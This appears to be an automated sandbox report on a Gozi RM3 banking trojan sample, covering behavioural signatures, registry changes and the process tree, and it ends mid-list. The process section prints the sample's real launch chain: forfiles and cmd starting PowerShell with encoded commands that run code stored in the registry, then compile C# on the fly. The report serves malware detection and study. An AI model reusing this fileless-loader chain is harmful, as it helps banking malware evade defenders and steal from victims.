Malware Analysis Report

2024-10-19 03:00

Sample ID 220315-h8lpzaghf8
Target Restr.com
SHA256 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Tags
gozi_rm3 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Threat Level: Known bad

The file Restr.com was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 07:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 07:24

Reported

2022-03-15 07:27

Platform

win7-20220311-en

Max time kernel

4294211s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000051ac8743cf487117fe14a79028e2ce35385be2ed8fc034d94a258f233e751609000000000e8000000002000020000000623baf82939646b332065e0960d984c9b0043b7f8168fb91926ab13aa76a4fe8200000000b3c09e8e708ffa202ac693a2c6a64b22fe0dde332c468d63494070e05932178400000006f80b8ce6d7166b1b70ac848ecb3fbb0f2443199de1d37da138d7c8103976e9dc530d7aed1f0f826d5d22b04f5fcd8af48e600cc750c4a2c113bf97e611a8f7c C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 707487c13d38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FA820831-A430-11EC-9919-DECC31BAF6C7} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000d021195672043264c8de0c4eaba5c6870d8701d231578338cc84c43700d59315000000000e80000000020000200000008fbf60f1e082f0630635d8910aaadf534fce207169b9b8d2374d7f1dabe05fcf300100009c2696e2bcb5660fa716864cdd67b04e86edf3e3059981dacbdc210b08719eb68ad38904cdceb10151d13daed1dcd2ec6e7c650e62809b7c18bffa931d2b7439f79624b7dd2c8796fa8ba577bec5f866bc068972c5de761b327f1e26effb052f90c6d9973cdb30606c2d2b275eae7bec31dac391e8c1e5e99439ffaf1aea15be79ecbd83344b484c872f6e4edb7ca0c2e2a7aaac7defd5dff0b312b177ebe8c4c0a0b5162ceaa1ecaa39cadef489be8cc41333e9ddeb558cef74ae4bf30c4501599f7bb9bb52cabbbfee22e630c90d1eef53328a565ab994b6c683f4c7f28e8d6e12a353cb0354bc698fbfed6618c6522885ffef88a29de0156431c88e4e9b1d93fc38336df56959fc92973ef3d62e8390ef7450ca9c96ca8d77c5b6cfb1e1b0e5917889896f41c8802a787aae2c9a174000000072d7403a68c9891261b4991dbd4bd02f88b90eccaa45fd644db6405ec00607db03ad7f45d98141240b137fc5863cb525c1ce724355cf37168a15203d97e07a87 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000e02b9c2abba78d46fcd431661a47d74e3cdc31812f5185de1d68eead020be7a8000000000e80000000020000200000004f6d5d443b7759ce2dd19730d5233032e72585c82406155a8e454a5eea2c3b18300100007c34e20c3c0a71143a6b67c32f868bfab2ecbf244179a9a09298a124fd7b1476fa62bfcc83d82a497c9a7c1d4c125f033f6d0a1d903e99e08bcc7bf27342fb192b4107c1733f1eb6b1ef1e7fa18a4947470ba98376cfb7527eb337e478a4702388fd6649d245f55d870f6f8bf4b5f23cf3d202538c34b6bb8b95cbcb8f73e1162137b10dc0ce9620edf32282deb6f972a51baade834ae1fbde2f6aba5de623cf254b83d18c0db205b4a7b8519f1307f91487c162133f26641853aaaedea0d3001052c6c41071dc92fa02f10fbb143ced61e6fafe731e7cd674c8cbe8de3c05cd076110ab7e93883495721b3e6aebbefe2ecf2a2da4ddcde734b521ec2c59d840ed69e66bb67aab98af5ab08267d74df4af5c5f32a05f9aa495c235de62de5f029f2ac12cab55102dbac8ef5aa839c3d840000000593b33f91c3505102b341d1c811d8ed963ffa906649c0cae3e1bf16f58e68ed0a23d47c21f625ce84cfd829a821dc3df3f71b628dab04afe688becef42c76d29 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1796 wrote to memory of 1276 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 580 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfhkfkff.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

